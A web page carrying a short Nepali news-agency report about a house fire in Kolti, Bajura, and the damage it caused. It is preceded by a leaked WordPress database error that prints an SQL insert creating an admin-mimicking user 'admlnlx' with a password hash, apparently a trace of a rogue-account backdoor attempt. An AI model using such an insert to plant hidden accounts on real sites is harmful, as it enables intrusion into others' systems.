WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bp2pqI5skbi5gwzREcpjKoVgFZsDZp.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 20:00:44', '', 'admlnlx', 'admlnlx')
बाजुरा, माघ १९ –
कोल्टी गाविसमा आज एक घर जलेर नष्ट भएको छ ।
कोल्टी–१ बस्ने जसबहादुर कार्कीका घरमा अपराह्न आगलागी हुँदा रु एक लाखको क्षति भएको बिसुगार्ड प्रहरी चौकीले जनाएको छ । आगलागीबाट घर जल्नाका साथै घरमा रहेका धनमाल र अन्न जलेर नष्ट भएको जिल्ला प्रहरी कार्यालयका प्रहरी नायब उपरीक्षक दलबहादुर बोगटीले जानकारी दिनु भएको छ । कोल्टीमा रहेका नेपाली सेना, नेपाल प्रहरी र स्थानीयवासीको सक्रियतामा आगलागी नियन्त्रणमा लिइएको बताइएको छ । – रासस